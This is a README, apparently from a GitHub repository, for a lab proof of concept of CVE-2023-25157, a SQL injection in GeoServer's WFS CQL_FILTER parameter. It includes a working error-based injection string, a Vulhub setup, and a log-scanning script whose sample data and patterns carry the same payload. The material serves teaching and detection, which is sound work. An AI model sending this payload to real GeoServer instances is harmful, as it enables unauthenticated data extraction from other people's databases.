## https://sploitus.com/exploit?id=2B14A662-EE2B-513F-BF2C-1D7871AA9CB4
# geoserver CVE-2023-25157

> T�tǸ҇� 30� [30�] @�Ȱ�

---

GitHub link - https://github.com/custiya/geoserver-CVE-2023-25157



### Vulnerability overview

* CVE-2023-25157 is a SQL injection (SQLi) vulnerability in GeoServer: filter expressions are passed on to the backing database without proper escaping.

* Present in GeoServer 2.22.0 and some earlier versions.

* Triggered through the CQL_FILTER parameter of a WFS (Web Feature Service) request.

* The affected API is reachable without authentication.



### Environment setup

* Start the test environment with `docker compose up -d`.

* Confirm that http://your-ip:8080/geoserver is reachable.

* The PoC needs the PostGIS database details (workspace, datastore, table and column), so check them first.

* The Vulhub GeoServer instance already has a PostGIS database configured:

    * workspace name : vulhub

    * datastore name : pg

    * table name : example

    * string attribute : name



### poc.py

* Using the information above, build the SQLi string.

* The string is sent with the request module.

* strStartsWith(name,'x'') = true

    * The extra ' after x (written as '' in CQL) is not escaped in the generated SQL, so it breaks out of the string in the SQL statement.

* and 1=(SELECT CAST ((SELECT version()) AS integer))

    * version() returns the running PostgreSQL version, which is a string.

    * CAST(... AS integer) tries to convert that string to an integer, which raises an error.

    * The result can be read from the error message, and a Blind SQL Injection test is also possible.

```python
# Target URL
url = "http://localhost:8080/geoserver/ows"

# CQL_FILTER value carrying the injection (URL-encoded when the request is sent)
cql_filter = "strStartsWith(name,'x'') = true and 1=(SELECT CAST ((SELECT version()) AS integer)) -- ') = true"

# WFS GetFeature request parameters
params = {
    "service": "wfs",
    "version": "1.0.0",
    "request": "GetFeature",
    "typeName": "vulhub:example",
    "CQL_FILTER": cql_filter
}
```
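A defender-side check for the request shape explained above, added here as an example (it is not part of this repository): it pulls CQL_FILTER out of constructed access-log request fields and flags values whose string literal contains the escaped quote `''` together with SQL tokens. The log format and the list of affected filter functions beyond strStartsWith are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log request fields (assumption: "METHOD target" form;
# real GeoServer/servlet log formats carry more fields). Line 2 has the filter
# shape from the PoC above; line 1 is a benign prefix search.
SAMPLE_LOG = """\
GET /geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith(name,'ab')=true
GET /geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith(name,'x'')%20%3D%20true%20and%201%3D(SELECT%20CAST%20((SELECT%20version())%20AS%20integer))%20--%20')%20%3D%20true
GET /geoserver/wms?service=WMS&request=GetMap&layers=vulhub:example
"""

# A CQL string literal; inside it, '' is the escaped form of a single quote.
CQL_LITERAL = re.compile(r"'((?:[^']|'')*)'")
# Tokens that have no business inside a CQL string literal.
SQL_TOKENS = re.compile(r"--|/\*|;|\b(?:select|cast|union|pg_sleep)\b", re.IGNORECASE)

def extract_cql_filter(request_field):
    """Return the URL-decoded CQL_FILTER value of a request field, or None."""
    parts = request_field.split(" ")
    if len(parts) < 2:
        return None
    for key, values in parse_qs(urlsplit(parts[1]).query, keep_blank_values=True).items():
        if key.lower() == "cql_filter":
            return values[0]
    return None

def analyse_cql_filter(cql):
    """Reasons a CQL_FILTER value matches the CVE-2023-25157 injection shape."""
    reasons = []
    literals = CQL_LITERAL.findall(cql)
    if any("''" in lit for lit in literals):
        reasons.append("escaped quote inside string literal")
    tokens = sorted({m.lower() for m in SQL_TOKENS.findall(cql)})
    if tokens:
        reasons.append("SQL tokens in filter: " + " ".join(tokens))
    return reasons

def scan_log(text):
    """Return (line_number, reasons) for every request whose CQL_FILTER looks injected."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        cql = extract_cql_filter(line)
        if cql:
            reasons = analyse_cql_filter(cql)
            if reasons:
                hits.append((n, reasons))
    return hits

if __name__ == "__main__":
    for n, reasons in scan_log(SAMPLE_LOG):
        print(f"line {n}: {'; '.join(reasons)}")
```

Only the second sample line is reported; a plain prefix search with a single-quoted literal passes.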

### Result

![Alt text](result.png)



### Note

* This PoC confirms whether the SQLi is present. It shows that an attacker could use SQL queries to collect information about the system.

* This makes clear that user input has to be validated. Input values must also be checked thoroughly and managed so that they are never passed through and executed as SQL statements.